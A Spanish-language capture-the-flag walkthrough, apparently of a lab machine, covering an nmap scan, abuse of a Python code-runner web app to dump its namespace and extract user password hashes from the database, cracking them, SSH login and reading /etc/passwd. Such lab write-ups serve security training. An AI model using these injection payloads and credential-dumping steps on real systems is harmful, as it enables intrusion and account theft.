Foto de pwneado figureti:
Primero realizamos un escaneo de puertos:
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ # Nmap 7.94SVN scan initiated Sat Mar 22 16:09:17 2025 as: nmap -Pn -n --disable-arp-ping -p- -sV --min-rate 3000 --open -vvv -oN puertos.txt 10.10.11.62
2 │ Nmap scan report for 10.10.11.62
3 │ Host is up, received user-set (0.20s latency).
4 │ Scanned at 2025-03-22 16:09:17 -05 for 34s
5 │ Not shown: 64026 closed tcp ports (conn-refused), 1507 filtered tcp ports (no-response)
6 │ Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
7 │ PORT STATE SERVICE REASON VERSION
8 │ 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
9 │ 5000/tcp open http syn-ack Gunicorn 20.0.4
10 │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
11 │
12 │ Read data files from: /usr/bin/../share/nmap
13 │ Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
14 │ # Nmap done at Sat Mar 22 16:09:51 2025 -- 1 IP address (1 host up) scanned in 33.99 seconds
Web:
A simple vista vemos que es un apartado para ejecutar codigo de Python
Si revisamos los otros apartados encontramos con lo tipico y nada completamente relevante asi que nos concentraremos en el apartado de codigo. Primero vere el diccionario del the module namespace con globals() y el diccinario del current namespace con locals()
{'__name__': 'app', '__doc__': None, '__package__': '', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fe6d56486d0>,
'__spec__': ModuleSpec(name='app', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fe6d56486d0>,
origin='/home/app-production/app/app.py'), '__file__': '/home/app-production/app/app.py',
'__cached__': '/home/app-production/app/__pycache__/app.cpython-38.pyc', '__builtins__': {'__name__': 'builtins',
'__doc__': "Built-in functions, exceptions, and other objects.\\n\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.",
'__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins',
loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__':
<built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>,
'ascii': <built-in function ascii>, 'bin': <built-in function bin>,
'breakpoint': <built-in function breakpoint>,
'callable': <built-in function callable>,
'chr': <built-in function chr>,
'compile': <built-in function compile>,
'delattr': <built-in function delattr>,
'dir': <built-in function dir>, 'divmod': <built-in function divmod>,
'eval': <built-in function eval>, 'exec': <built-in function exec>,
'format': <built-in function format>, 'getattr': <built-in function getattr>
, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>,
'hash': <built-in function hash>, 'hex': <built-in function hex>,
'id': <built-in function id>, 'input': <built-in function input>,
'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.}, 'Flask': <class 'flask.app.Flask'>, 'render_template': <function render_template at 0x7fe6d5007ee0>, 'render_template_string': <function render_template_string at 0x7fe6d5007f70>, 'request': <Request '<http://10.10.11.62:5000/run_code>' [POST]>, 'jsonify': <function jsonify at 0x7fe6d52b1c10>, 'redirect': <function redirect at 0x7fe6d511a3a0>, 'url_for': <function url_for at 0x7fe6d511a310>, 'session': <SecureCookieSession {'_flashes': [('message', 'Registration successful! You can now log in.'), ('message', 'Login successful!'), ('message', 'You do not have permission to view this code.'), ('message', 'You have been logged out.'), ('message', 'Registration successful! You can now log in.'), ('message', 'Login successful!'), ('message', 'You have been logged out.')]}>, 'flash': <function flash at 0x7fe6d511a550>, 'SQLAlchemy': <class 'flask_sqlalchemy.extension.SQLAlchemy'>, 'sys': <module 'sys' (built-in)>, 'io': <module 'io' from '/usr/lib/python3.8/io.py'>, 'os': <module 'os' from '/usr/lib/python3.8/os.py'>, 'hashlib': <module 'hashlib' from '/usr/lib/python3.8/hashlib.py'>, 'app': <Flask 'app'>, 'db': <SQLAlchemy sqlite:////home/app-production/app/instance/database.db>, 'User': <class 'app.User'>, 'Code': <class 'app.Code'>, 'index': <function index at 0x7fe6d40558b0>, 'register': <function register at 0x7fe6d4055b80>, 'login': <function login at 0x7fe6d4055c10>, 'logout': <function logout at 0x7fe6d4055ca0>, 'run_code': <function run_code at 0x7fe6d4055e50>, 'load_code': <function load_code at 0x7fe6d3ed0040>, 'save_code': <function save_code at 0x7fe6d3ed01f0>, 'codes': <function codes at 0x7fe6d3ed03a0>, 'about': <function about at 0x7fe6d3ed0550>} {'code': 'print(globals())\\nprint(locals())', 'old_stdout': <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>, 'redirected_output': <_io.StringIO object at 0x7fe6d3ea5dc0>, 'keyword': '__builtins__'}
Veremos que existe un objeto llamado User asi que probemos explotarlo con
print([(user.id, user.username, user.password) for user in User.query.all()])
Cual nos entregara lo siguiente:
(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'),
(2, 'martin', '3de6f30c4a09c27fc71932bfc68474be'),
(3, 'pippo', '0c88028bf3aa6a6a143ed846f2be1ea4')]
Si crackeamos las passwords nos dara:
Probaremos posibles usuarios y contraseñas en orden para el servicio ssh dandonos como existoso el usuario martin .
Si listamos por primera vez no nos damos cuenta que no encontramos lo que buscamos (la user flag) asi que enumeremos posibles usuarios, esto se puede hacer de dos formas viendo el directorio /home o el /etc/passwd
martin@code:/home$ cat /etc/passwd | grep "/home"
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
app-production:x:1001:1001:,,,:/home/app-production:/bin/bash
martin:x:1000:1000:,,,:/home/martin:/bin/bash
martin@code:/home$ ls
app-production martin
martin@code:/home$
Encontrando el usuario app-production muy posible portador de la user.txt .